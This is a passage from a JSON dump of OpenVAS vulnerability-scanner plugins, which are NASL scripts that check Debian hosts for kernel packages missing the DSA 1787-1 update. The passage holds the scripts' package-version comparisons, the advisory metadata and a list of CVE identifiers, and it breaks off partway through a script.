isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-amd64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-amd64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-amd64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-ixp4xx\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-iop32x\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-footbridge\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-footbridge\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-ixp4xx\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-iop32x\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-arm\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-hppa\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-686\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-486\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-686-bigmem\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-i386\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-686-bigmem\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-486\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-686\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-mckinley\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-itanium\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-itanium\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-mckinley\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-ia64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-5kc-malta\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-r4k-ip22\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-mips\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-r4k-ip22\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-r5k-ip32\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-r5k-ip32\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-5kc-malta\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-4kc-malta\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-4kc-malta\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-r5k-cobalt\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-mipsel\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-r5k-cobalt\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-powerpc\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-powerpc-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-powerpc\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-powerpc-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-powerpc-miboot\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-powerpc64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-powerpc-miboot\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-powerpc64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-powerpc\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-s390-tape\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-s390\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-s390\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-s390\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-s390x\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-s390x\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-sparc\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-sparc64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-sparc64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-sparc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-sparc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:21", "description": "The remote host is missing an update to linux-2.6.24\nannounced via advisory DSA 1787-1.", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1787-1 (linux-2.6.24)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-5702", "CVE-2009-1046", "CVE-2008-5395", "CVE-2008-5700", "CVE-2009-0859", "CVE-2009-0675", "CVE-2008-4307", "CVE-2009-0028", "CVE-2009-1242", "CVE-2009-0322", "CVE-2009-0676", "CVE-2009-1192", "CVE-2008-5079", "CVE-2009-0065", "CVE-2009-0745", "CVE-2009-1338", "CVE-2009-1337", "CVE-2009-0269", "CVE-2009-0834", "CVE-2009-1265", "CVE-2009-0031", "CVE-2009-1439", "CVE-2009-0029", "CVE-2008-5701"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231063939", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063939", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1787_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1787-1 (linux-2.6.24)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a denial of service or privilege escalation. For details,\nplease visit the referenced security advisories.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 2.6.24-6~etchnhalf.8etch1.\n\nWe recommend that you upgrade your linux-2.6.24 packages.\";\ntag_summary = \"The remote host is missing an update to linux-2.6.24\nannounced via advisory DSA 1787-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201787-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63939\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 16:00:35 +0200 (Tue, 05 May 2009)\");\n script_cve_id(\"CVE-2008-4307\", \"CVE-2008-5079\", \"CVE-2008-5395\", \"CVE-2008-5700\", \"CVE-2008-5701\", \"CVE-2008-5702\", \"CVE-2009-0028\", \"CVE-2009-0029\", \"CVE-2009-0031\", \"CVE-2009-0065\", \"CVE-2009-0269\", \"CVE-2009-0322\", \"CVE-2009-0675\", \"CVE-2009-0676\", \"CVE-2009-0745\", \"CVE-2009-0834\", \"CVE-2009-0859\", \"CVE-2009-1046\", \"CVE-2009-1192\", \"CVE-2009-1242\", \"CVE-2009-1265\", \"CVE-2009-1337\", \"CVE-2009-1338\", \"CVE-2009-1439\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1787-1 (linux-2.6.24)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"linux-tree-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-support-2.6.24-etchnhalf.1\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-patch-debian-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-alpha\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-alpha-legacy\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-alpha-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-alpha-generic\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-alpha-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-alpha-generic\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-common\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-alpha-legacy\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-amd64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-amd64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-amd64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-ixp4xx\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-iop32x\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-footbridge\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-footbridge\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-ixp4xx\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-iop32x\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-arm\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-hppa\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc-smp\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-686\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-486\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-686-bigmem\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-i386\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-686-bigmem\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-486\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-686\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-mckinley\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-itanium\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-itanium\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-mckinley\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-ia64\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-5kc-malta\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-r4k-ip22\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-mips\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-r4k-ip22\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-r5k-ip32\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a\", ver:\"2.6.24-6~etchnhalf.8etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-r5k-ip32\", ver:\"2.6.24-6~etchnhalf.8etch1\", 